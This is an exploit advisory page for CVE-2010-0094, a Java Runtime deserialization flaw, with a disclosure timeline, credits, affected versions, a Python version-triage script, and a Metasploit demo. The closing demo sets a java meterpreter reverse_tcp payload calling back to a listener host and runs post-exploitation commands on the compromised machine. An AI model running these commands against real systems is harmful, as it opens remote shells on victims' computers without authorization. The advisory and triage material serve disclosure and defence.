Timeline :
Vulnerability reported to Oracle by ZDI on 2009-10-21
Coordinated public release of the advisory on 2010-04-05
Metasploit PoC provided by hdm on 2010-09-08
PoC provided by:
Sami Koivu
Matthias Kaiser
egypt
Reference(s) :
CVE-2010-0094
ZDI-10-051
Affected versions :
Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23
Tested on Windows XP SP3 with Java 6 Standard Edition Update 18
Description :
This module exploits a vulnerability in the Java Runtime Environment that allows a MarshalledObject containing a custom classloader to be deserialized under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.
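An added example, not part of the original page or of the Metasploit module: a triage check that compares `java -version` banners against the fixed updates listed under "Affected versions". It assumes the legacy Sun/Oracle version format `1.<family>.0_<update>`; the host names and sample banners are constructed.

```python
import re

# First fixed update per family, from the "Affected versions" list above.
FIXED_UPDATE = {6: 19, 5: 23}

# Legacy Sun/Oracle scheme (assumed): 1.<family>.0[_<update>], e.g. 1.6.0_18 or 1.5.0_23-b01.
_LEGACY = re.compile(r'\b1\.(\d+)\.\d+(?:_(\d+))?')


def parse_legacy_version(text):
    """Return (family, update) from a version banner or bare version string, else None."""
    m = _LEGACY.search(text)
    if not m:
        return None
    # A GA release such as 1.6.0 carries no _NN suffix and counts as update 0.
    return int(m.group(1)), int(m.group(2) or 0)


def is_affected(text):
    """True/False for Java 5 and 6; None if unparsable or a family the page does not cover."""
    parsed = parse_legacy_version(text)
    if parsed is None:
        return None
    family, update = parsed
    fixed = FIXED_UPDATE.get(family)
    return None if fixed is None else update < fixed


def triage(inventory):
    """Map host -> verdict for a {host: version banner} inventory."""
    labels = {True: "AFFECTED", False: "patched", None: "not covered"}
    return {host: labels[is_affected(banner)] for host, banner in inventory.items()}


# Constructed sample inventory (hypothetical hosts, not from the page).
SAMPLE = {
    "ws-01": 'java version "1.6.0_18"',
    "ws-02": 'java version "1.6.0_19"',
    "ws-03": 'java version "1.5.0_22"',
    "ws-04": 'java version "1.5.0_23-b01"',
    "ws-05": 'java version "1.6.0"',
    "ws-06": 'openjdk version "17.0.2" 2022-01-18',
}

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE).items():
        print(f"{host}: {verdict}")
```

A "not covered" verdict means only that the version falls outside the two families this page lists, not that the host has been assessed.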
Metasploit demo :
use multi/browser/java_rmi_connection_impl
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig
Owned !